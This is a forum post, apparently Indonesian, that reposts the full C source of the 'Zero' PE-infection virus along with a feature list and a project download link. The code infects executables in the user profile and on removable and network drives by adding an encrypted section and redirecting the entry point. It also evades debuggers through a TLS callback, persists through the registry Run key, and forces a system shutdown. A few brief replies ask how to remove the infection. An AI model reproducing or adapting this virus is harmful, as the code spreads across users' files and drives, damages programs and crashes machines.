PE infection virus - Zero virus (source code)

[color=#5a5a5a][size=small]Zero is zwclose7 first PE infection virus. The name is from a Rockman character.[/size][/color]

[color=#5a5a5a][size=small][video=youtube]https://www.youtube.com/watch?v=7PM_j6fazHc[/video][/size][/color]
[color=#5a5a5a][size=small] [/size][/color]
[color=#5a5a5a][size=small][color=#ff0000]This is not overwriting virus![/color][/size][/color]
[color=#5a5a5a][size=small] [/size][/color]
[color=#5a5a5a][size=small]The virus search for executable files to infect in the user profile. The virus also infect removable and network drives.[/size][/color]
[color=#5a5a5a][size=small]The file is infected by adding a new section that contains the virus code and the whole body of the virus itself. The virus body in the infected file is encrypted.[/size][/color]

[color=#5a5a5a][size=small][color=#5a5a5a][size=small][size=x-large]Features[/size][/size][/color][/size][/color]

[color=#5a5a5a][size=small]1) Infects files in user profile, removable and network drives.[/size][/color]
[color=#5a5a5a][size=small]2) Infects file by adding new section to the file.[/size][/color]
[color=#5a5a5a][size=small]3) The virus body in the infected file is encrypted.[/size][/color]
[color=#5a5a5a][size=small]4) Anti-debugging.[/size][/color]
[color=#5a5a5a][size=small]5) Run on Windows startup.[/size][/color]
[color=#5a5a5a][size=small]6) Multithreaded.[/size][/color]
[color=#5a5a5a][size=small]7) Uses Native API.[/size][/color]

[color=#5a5a5a][size=small]When an infected file is executed, it performs the following actions:[/size][/color]

[color=#5a5a5a][size=small]1) The virus code executes, and parse the loader data from the PEB to resolve all APIs that the virus code needs.[/size][/color]
[color=#5a5a5a][size=small]2) The virus code drop the virus executable in the temp folder.[/size][/color]
[color=#5a5a5a][size=small]3) The virus executable is executed, and the virus installs itself to the system.[/size][/color]
[color=#5a5a5a][size=small][color=#5a5a5a][size=small]4) The original entry point of the infected file is called, and the program runs as normal.[/size][/color][/size][/color]

transate sendiri udah pada gede (anunya) :ngakak:

[php]#include <stdio.h>
#include <Windows.h>
#include <ImageHlp.h>
#include “ntdll.h”

#pragma comment(lib,“imagehlp.lib”)
#pragma comment(lib,“ntdll.lib”)

#pragma comment(linker,"/include:__tls_used")
#pragma section(".CRT$XLB",read)

#define Align(Value,Alignment) (((Value+Alignment-1)/Alignment)*Alignment)
#define VIRUS_KEY 0xF4
#define VIRUS_FLAG ((VIRUS_KEY^0x7FFFFFFF)^0xF0F0F0F0)

typedef DWORD (WINAPI *pExpandEnvironmentStringsA)(
LPCSTR lpSrc,
LPSTR lpDst,
DWORD nSize
);

typedef HANDLE (WINAPI *pCreateFileA)(
LPCSTR lpFileName,
DWORD dwDesiredAccess,
DWORD dwShareMode,
LPSECURITY_ATTRIBUTES lpSecurityAttributes,
DWORD dwCreationDisposition,
DWORD dwFlagsAndAttributes,
HANDLE hTemplateFile
);

typedef BOOL (WINAPI *pWriteFile)(
HANDLE hFile,
LPCVOID lpBuffer,
DWORD nNumberOfBytesToWrite,
LPDWORD lpNumberOfBytesWritten,
LPOVERLAPPED lpOverlapped
);

typedef LPVOID (WINAPI *pVirtualAlloc)(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);

typedef BOOL (WINAPI *pCloseHandle)(HANDLE Handle);

typedef BOOL (WINAPI *pVirtualFree)(
LPVOID lpAddress,
SIZE_T dwSize,
DWORD dwFreeType
);

typedef BOOL (WINAPI *pCreateProcessA)(
LPCSTR lpApplicationName,
LPSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCSTR lpCurrentDirectory,
LPSTARTUPINFOA lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation
);

typedef enum _HARDERROR_RESPONSE_OPTION
{
OptionAbortRetryIgnore,
OptionOk,
OptionOkCancel,
OptionRetryCancel,
OptionYesNo,
OptionYesNoCancel,
OptionShutdownSystem,
OptionOkNoWait,
OptionCancelTryContinue
}HARDERROR_RESPONSE_OPTION;

typedef enum _HARDERROR_RESPONSE
{
ResponseReturnToCaller,
ResponseNotHandled,
ResponseAbort,
ResponseCancel,
ResponseIgnore,
ResponseNo,
ResponseOk,
ResponseRetry,
ResponseYes,
ResponseTryAgain,
ResponseContinue
}HARDERROR_RESPONSE;

extern “C” NTSTATUS NTAPI NtRaiseHardError(
NTSTATUS ErrorStatus,
ULONG NumberOfParameters,
ULONG UnicodeStringParameterMask,
PULONG_PTR Parameters,
ULONG ValidResponseOptions,
PULONG Response
);

PVOID VirusFile;
ULONG VirusSize;

PIMAGE_SECTION_HEADER WINAPI AddSection(PVOID Image,PSTR SectionName,ULONG SectionSize,ULONG Characteristics)
{
PIMAGE_DOS_HEADER pIDH;
PIMAGE_NT_HEADERS pINH;
PIMAGE_SECTION_HEADER pISH;

ULONG i;

pIDH=(PIMAGE_DOS_HEADER)Image;

if(pIDH->e_magic!=IMAGE_DOS_SIGNATURE)
{
	return NULL;
}

pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Image+pIDH->e_lfanew);

if(pINH->Signature!=IMAGE_NT_SIGNATURE)
{
	return NULL;
}

pISH=(PIMAGE_SECTION_HEADER)(pINH+1);
i=pINH->FileHeader.NumberOfSections;

memset(&pISH[i],0,sizeof(IMAGE_SECTION_HEADER));

pISH[i].Characteristics=Characteristics;
pISH[i].PointerToRawData=Align(pISH[i-1].PointerToRawData+pISH[i-1].SizeOfRawData,pINH->OptionalHeader.FileAlignment);
pISH[i].VirtualAddress=Align(pISH[i-1].VirtualAddress+pISH[i-1].Misc.VirtualSize,pINH->OptionalHeader.SectionAlignment);
pISH[i].SizeOfRawData=Align(SectionSize,pINH->OptionalHeader.SectionAlignment);
pISH[i].Misc.VirtualSize=SectionSize;

memcpy(pISH[i].Name,SectionName,8);

pINH->FileHeader.NumberOfSections++;
pINH->OptionalHeader.SizeOfImage=pISH[i].VirtualAddress+pISH[i].Misc.VirtualSize;

pINH->OptionalHeader.CheckSum=0;
return &pISH[i];

}

int WINAPI VirusCode()
{
PIMAGE_DOS_HEADER pIDH;
PIMAGE_NT_HEADERS pINH;
PIMAGE_EXPORT_DIRECTORY pIED;

PPEB Peb;
PLDR_DATA_TABLE_ENTRY Ldr;

PVOID Buffer,Module,Kernel32Base;
ULONG i,Hash,FileSize,EntryPointRva,VirusRva,write;

PUCHAR EncryptedVirus,DecryptedVirus,ptr;
PULONG Function,Name;
PUSHORT Ordinal;

FARPROC EntryPoint; // Original entry point
HANDLE hFile;

STARTUPINFOA si;
PROCESS_INFORMATION pi;

pExpandEnvironmentStringsA fnExpandEnvironmentStringsA;
pCreateFileA fnCreateFileA;
pWriteFile fnWriteFile;
pVirtualAlloc fnVirtualAlloc;
pCloseHandle fnCloseHandle;
pVirtualFree fnVirtualFree;
pCreateProcessA fnCreateProcessA;

char FilePath[]={'%','t','e','m','p','%','\\','Z','e','r','o','.','e','x','e',0},FileName[260];

__asm
{
	mov eax,0x41414141
	mov EntryPointRva,eax

	mov eax,0x42424242
	mov VirusRva,eax

	mov eax,0x43434343
	mov FileSize,eax
}

Peb=NtCurrentPeb(); // Get the PEB
Ldr=CONTAINING_RECORD(Peb->Ldr->InMemoryOrderModuleList.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // Read the loader data

Module=Ldr->DllBase; // Process executable

Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // ntdll (not used)
Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // kernel32

Kernel32Base=Ldr->DllBase; // Store the address of kernel32

pIDH=(PIMAGE_DOS_HEADER)Kernel32Base;
pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Kernel32Base+pIDH->e_lfanew);

// Get the export directory of kernel32

pIED=(PIMAGE_EXPORT_DIRECTORY)((PUCHAR)Kernel32Base+pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

Function=(PULONG)((PUCHAR)Kernel32Base+pIED->AddressOfFunctions);
Name=(PULONG)((PUCHAR)Kernel32Base+pIED->AddressOfNames);

Ordinal=(PUSHORT)((PUCHAR)Kernel32Base+pIED->AddressOfNameOrdinals);

// Loop over the function names

for(i=0;i<pIED->NumberOfNames;i++)
{
	PUCHAR ptr=(PUCHAR)Kernel32Base+Name[i]; // Pointer to function name
    ULONG Hash=0;

	// Compute the hash

    while(*ptr)
    {
	    Hash=((Hash<<8)+Hash+*ptr)^(*ptr<<16);
	    ptr++;
    }

	// Hash of ExpandEnvironmentStringsA

	if(Hash==0x575d1e20)
	{
		fnExpandEnvironmentStringsA=(pExpandEnvironmentStringsA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
	}

	// Hash of CreateFileA

	if(Hash==0xd83eb415)
	{
		fnCreateFileA=(pCreateFileA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
	}

	// Hash of WriteFile

	if(Hash==0xa5e7378b)
	{
		fnWriteFile=(pWriteFile)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
	}

	// Hash of VirtualAlloc

	if(Hash==0xa15d96d2)
	{
		fnVirtualAlloc=(pVirtualAlloc)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
	}

	// Hash of CloseHandle

	if(Hash==0x7dfbd342)
	{
		fnCloseHandle=(pCloseHandle)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
	}

	// Hash of VirtualFree

	if(Hash==0x6f043b69)
	{
		fnVirtualFree=(pVirtualFree)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
	}

	// Hash of CreateProcessA

	if(Hash==0xae3b3c74)
	{
		fnCreateProcessA=(pCreateProcessA)((PUCHAR)Kernel32Base+Function[Ordinal[i]]);
	}
}

EncryptedVirus=(PUCHAR)Module+VirusRva; // Get the virus body
Buffer=fnVirtualAlloc(NULL,FileSize,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE); // Allocate buffer

if(Buffer)
{
	DecryptedVirus=(PUCHAR)Buffer;

	// Decrypt the virus

	for(i=0;i<FileSize;i++)
	{
		DecryptedVirus[i]=EncryptedVirus[i]^VIRUS_KEY;
	}

	fnExpandEnvironmentStringsA(FilePath,FileName,sizeof(FileName));

	// Drop the virus in temp folder

	hFile=fnCreateFileA(FileName,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);

	if(hFile!=INVALID_HANDLE_VALUE)
	{
		// Write the virus to file

		if(fnWriteFile(hFile,Buffer,FileSize,&write,NULL))
		{
			fnCloseHandle(hFile); // Close the file handle
			fnVirtualFree(Buffer,0,MEM_RELEASE); // Free the buffer

			ptr=(PUCHAR)&si;

			// Zero the structures

			for(i=0;i<sizeof(si);i++)
			{
				ptr[i]=0;
			}

			ptr=(PUCHAR)&pi;

			for(i=0;i<sizeof(pi);i++)
			{
				ptr[i]=0;
			}

			// Run the virus executable

			if(fnCreateProcessA(FileName,NULL,NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
			{
				fnCloseHandle(pi.hThread);
				fnCloseHandle(pi.hProcess);
			}
		}
	}
}

// Call the original entry point

EntryPoint=(FARPROC)((PUCHAR)Module+EntryPointRva);
return EntryPoint();

}

void WINAPI VirusEnd()
{
return;
}

BOOL WINAPI IsValidExecutable(HANDLE hFile,PULONG SectionAlignment)
{
PIMAGE_DOS_HEADER pIDH;
PIMAGE_NT_HEADERS pINH;

PVOID Buffer;
ULONG FileSize,read;

FileSize=GetFileSize(hFile,NULL);
Buffer=VirtualAlloc(NULL,FileSize,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);

if(!Buffer)
{
	return FALSE;
}

if(!ReadFile(hFile,Buffer,FileSize,&read,NULL))
{
	VirtualFree(Buffer,0,MEM_RELEASE);
	return FALSE;
}

__try
{
	pIDH=(PIMAGE_DOS_HEADER)Buffer;
	
	if(pIDH->e_magic!=IMAGE_DOS_SIGNATURE)
	{
		VirtualFree(Buffer,0,MEM_RELEASE);
		return FALSE;
	}

	pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Buffer+pIDH->e_lfanew);

	if(pINH->Signature!=IMAGE_NT_SIGNATURE)
	{
		VirtualFree(Buffer,0,MEM_RELEASE);
		return FALSE;
	}

	// Make sure it is 32-bit program

	if(pINH->FileHeader.Machine!=IMAGE_FILE_MACHINE_I386)
	{
		VirtualFree(Buffer,0,MEM_RELEASE);
		return FALSE;
	}

	if(pINH->FileHeader.Characteristics & IMAGE_FILE_DLL)
	{
		VirtualFree(Buffer,0,MEM_RELEASE);
		return FALSE;
	}

	if(pINH->OptionalHeader.LoaderFlags==VIRUS_FLAG)
	{
		VirtualFree(Buffer,0,MEM_RELEASE);
		return FALSE;
	}

	if(pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress)
	{
		VirtualFree(Buffer,0,MEM_RELEASE);
		return FALSE;
	}

	if(pINH->OptionalHeader.Subsystem==IMAGE_SUBSYSTEM_WINDOWS_CUI || pINH->OptionalHeader.Subsystem==IMAGE_SUBSYSTEM_WINDOWS_GUI)
	{
		if(SectionAlignment)
		{
			*SectionAlignment=pINH->OptionalHeader.SectionAlignment;
		}
		
		VirtualFree(Buffer,0,MEM_RELEASE);
		return TRUE;
	}
}

__except(EXCEPTION_EXECUTE_HANDLER)
{
	VirtualFree(Buffer,0,MEM_RELEASE);
	return FALSE;
}

VirtualFree(Buffer,0,MEM_RELEASE);
return FALSE;

}

void WINAPI InfectFile(PSTR FileName)
{
PIMAGE_DOS_HEADER pIDH;
PIMAGE_NT_HEADERS pINH;
PIMAGE_SECTION_HEADER pISH;

HANDLE hFile,hMap;
PVOID MappedFile;
ULONG i,FileSize,SectionSize,CodeSize,SectionAlignment,AlignedSize,OldChecksum,NewChecksum;

PUCHAR CodeAddress,VirusAddress,ptr;

hFile=CreateFile(FileName,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);

if(hFile!=INVALID_HANDLE_VALUE)
{
	if(!IsValidExecutable(hFile,&SectionAlignment))
	{
		NtClose(hFile);
		return;
	}

	CodeSize=(ULONG)VirusEnd-(ULONG)VirusCode;
	SectionSize=CodeSize+VirusSize;

	FileSize=GetFileSize(hFile,NULL);
	AlignedSize=FileSize+Align(SectionSize,SectionAlignment); // File size need to be aligned. Otherwise the program will not run after infection.

	hMap=CreateFileMapping(hFile,NULL,PAGE_READWRITE,0,AlignedSize,NULL);

	if(hMap)
	{
		MappedFile=MapViewOfFile(hMap,FILE_MAP_ALL_ACCESS,0,0,0);

		if(MappedFile)
		{
			pIDH=(PIMAGE_DOS_HEADER)MappedFile;
			pINH=(PIMAGE_NT_HEADERS)((PUCHAR)MappedFile+pIDH->e_lfanew);

			// Add a new section

			pISH=AddSection(MappedFile,"Zero",SectionSize,IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_EXECUTE);

			if(pISH)
			{
				ptr=(PUCHAR)MappedFile+pISH->PointerToRawData;

				CodeAddress=ptr;
				VirusAddress=CodeAddress+CodeSize;

				memcpy(CodeAddress,VirusCode,CodeSize); // Write the virus code to the file
				memcpy(VirusAddress,VirusFile,VirusSize); // Write the virus body to the file

				// Fill up placeholders

				while(1)
				{
					if(*ptr==0xb8 && *(PULONG)(ptr+1)==0x41414141)
					{
						*(PULONG)(ptr+1)=pINH->OptionalHeader.AddressOfEntryPoint;
						break;
					}

					ptr++;
				}

				ptr=(PUCHAR)MappedFile+pISH->PointerToRawData;

				while(1)
				{
					if(*ptr==0xb8 && *(PULONG)(ptr+1)==0x42424242)
					{
						*(PULONG)(ptr+1)=(ULONG)VirusAddress-pISH->PointerToRawData+pISH->VirtualAddress-(ULONG)MappedFile;
						break;
					}

					ptr++;
				}

				ptr=(PUCHAR)MappedFile+pISH->PointerToRawData;

				while(1)
				{
					if(*ptr==0xb8 && *(PULONG)(ptr+1)==0x43434343)
					{
						*(PULONG)(ptr+1)=VirusSize;
						break;
					}

					ptr++;
				}

				// Encrypt the virus

				for(i=0;i<VirusSize;i++)
				{
					VirusAddress[i]^=VIRUS_KEY;
				}

				pINH->OptionalHeader.AddressOfEntryPoint=(ULONG)CodeAddress-pISH->PointerToRawData+pISH->VirtualAddress-(ULONG)MappedFile; // Set the entry point
				pINH->OptionalHeader.LoaderFlags=VIRUS_FLAG; // Set the infection flag. Since Windows no longer use loader flag, we can use this to store our infection flag.

				if(CheckSumMappedFile(MappedFile,AlignedSize,&OldChecksum,&NewChecksum))
				{
					pINH->OptionalHeader.CheckSum=NewChecksum; // Correct the checksum
				}

				FlushViewOfFile(MappedFile,0); // Flush the changes into file
				UnmapViewOfFile(MappedFile); // Unmap the file
			}
		}
	}
}

NtClose(hMap);
NtClose(hFile);

}

void WINAPI SearchFile(PSTR Directory)
{
HANDLE hFind;
WIN32_FIND_DATA FindData;

char SearchName[1024],FullPath[1024];
LARGE_INTEGER delay;

delay.QuadPart=(__int64)-10*10000;

memset(SearchName,0,sizeof(SearchName));
memset(&FindData,0,sizeof(WIN32_FIND_DATA));

sprintf(SearchName,"%s\\*",Directory);

hFind=FindFirstFile(SearchName,&FindData);

if(hFind!=INVALID_HANDLE_VALUE)
{
	while(FindNextFile(hFind,&FindData))
	{
		if(FindData.cFileName[0]=='.')
		{
			continue;
		}
		
		memset(FullPath,0,sizeof(FullPath));
		sprintf(FullPath,"%s\\%s",Directory,FindData.cFileName);

		if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
		{
			SearchFile(FullPath);
		}

		else
		{
			InfectFile(FullPath);
		}

		NtDelayExecution(FALSE,&delay);
	}

	FindClose(hFind);
}

}

void NTAPI TlsCallback(PVOID Module,ULONG Reason,PVOID Context)
{
HKEY hKey;
char ModulePath[1024],TempPath[60];

PPEB Peb=NtCurrentPeb();
ULONG_PTR DebugPort=0;

if(Reason!=DLL_PROCESS_ATTACH)
{
	return;
}

if(Peb->BeingDebugged)
{
	NtTerminateProcess(NtCurrentProcess(),0);
	while(1);
}

if(NT_SUCCESS(NtQueryInformationProcess(NtCurrentProcess(),ProcessDebugPort,&DebugPort,sizeof(ULONG_PTR),NULL)))
{
	if(DebugPort)
	{
		NtTerminateProcess(NtCurrentProcess(),0);
		while(1);
	}
}

GetModuleFileName(NULL,ModulePath,sizeof(ModulePath));

ExpandEnvironmentStrings("%temp%\\Zero.exe",TempPath,sizeof(TempPath));
CopyFile(ModulePath,TempPath,FALSE); // Copy the virus to temp folder

// Add the virus to registry

if(!RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey))
{
	RegSetValueEx(hKey,"Zero",0,REG_SZ,(PUCHAR)TempPath,sizeof(TempPath));
	RegCloseKey(hKey);
}

}

__declspec(allocate(".CRT$XLB")) PIMAGE_TLS_CALLBACK TlsCallbackAddress[]={TlsCallback,NULL};

DWORD WINAPI Zero(PVOID p)
{
BOOLEAN bl;
LARGE_INTEGER delay;

ULONG Response;

PPEB Peb=NtCurrentPeb();
ULONG_PTR DebugPort=0;

delay.QuadPart=(__int64)-10*10000;

while(1)
{
	if(Peb->BeingDebugged)
	{
		break;
	}

	if(NT_SUCCESS(NtQueryInformationProcess(NtCurrentProcess(),ProcessDebugPort,&DebugPort,sizeof(ULONG_PTR),NULL)))
	{
		if(DebugPort)
		{
			break;
		}
	}

	NtDelayExecution(FALSE,&delay);
}

RtlAdjustPrivilege(19,TRUE,FALSE,&bl);
NtRaiseHardError(0xC000026A,0,0,NULL,OptionShutdownSystem,&Response);

while(1);

}

DWORD WINAPI InfectUserProfile(PVOID p)
{
char UserProfile[1024];
LARGE_INTEGER delay;

delay.QuadPart=(__int64)-600000*10000;
GetEnvironmentVariable("userprofile",UserProfile,sizeof(UserProfile)); // Get the path of user profile

while(1)
{
	SearchFile(UserProfile); // Search for files to infect
	NtDelayExecution(FALSE,&delay);
}

}

DWORD WINAPI InfectDrives(PVOID p)
{
ULONG DriveType;
char drives[1024],*str;

LARGE_INTEGER delay;

delay.QuadPart=(__int64)-600000*10000;

while(1)
{
    memset(drives,0,sizeof(drives));

	GetLogicalDriveStrings(sizeof(drives),drives); // Get all drives
	str=drives;

	while(*str)
	{
	    DriveType=GetDriveType(str); // Check the drive type

		// Infect removable and network drives

		if(DriveType==DRIVE_REMOVABLE || DriveType==DRIVE_REMOTE)
		{
		    SearchFile(str); // Search for files to infect
		}

		str+=strlen(str)+1; // Get the next drive
	}

	NtDelayExecution(FALSE,&delay);
}

}

int WINAPI WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR lpCmdLine,int nCmdShow)
{
HANDLE hFile;
ULONG read,op;

CreateMutex(NULL,TRUE,"{755842AD-901B-482D-81B3-010C4EB22197}");

if(GetLastError()==ERROR_ALREADY_EXISTS)
{
	NtTerminateProcess(NtCurrentProcess(),0);
	while(1);
}

hFile=CreateFile(_pgmptr,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,NULL);

if(hFile!=INVALID_HANDLE_VALUE)
{
	VirusSize=GetFileSize(hFile,NULL);
	VirusFile=VirtualAlloc(NULL,VirusSize,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);

	if(VirusFile)
	{
		if(!ReadFile(hFile,VirusFile,VirusSize,&read,NULL))
	    {
		    NtClose(hFile);
		    return -1;
	    }
	}

	NtClose(hFile);
	VirtualProtect(VirusFile,VirusSize,PAGE_READONLY,&op); // Protect the virus data
}

// Create worker threads

CreateThread(NULL,0,Zero,NULL,0,NULL);
CreateThread(NULL,0,InfectUserProfile,NULL,0,NULL);
CreateThread(NULL,0,InfectDrives,NULL,0,NULL);

MessageBox(NULL,"You have been owned by Zero virus!","Zero virus by zwclose7",MB_ICONWARNING);

NtTerminateThread(NtCurrentThread(),0); // Terminate the current thread
while(1);

}[/php]

sumber : http://www.rohitab.com/discuss/topic/40857-my-first-pe-infection-virus-zero-virus/

download project visual studio : https://ufile.io/ytkg9 (link valid 30 hari disumber nya jg ada)
libs : https://chromium.googlesource.com/external/dynamorio/+/refs/heads/master/core/win32/ntdll.h

:chaer:

Update Video :chaer:

Kalo udah kena gimana penangananya om?

kenapa harus ngandalin vmem (VirtualAlloc API)… apakah stack statis udah gak laku… kenapaaaaaa? :ketawa:

trus klo sudah kena penangan nya gimana oms?~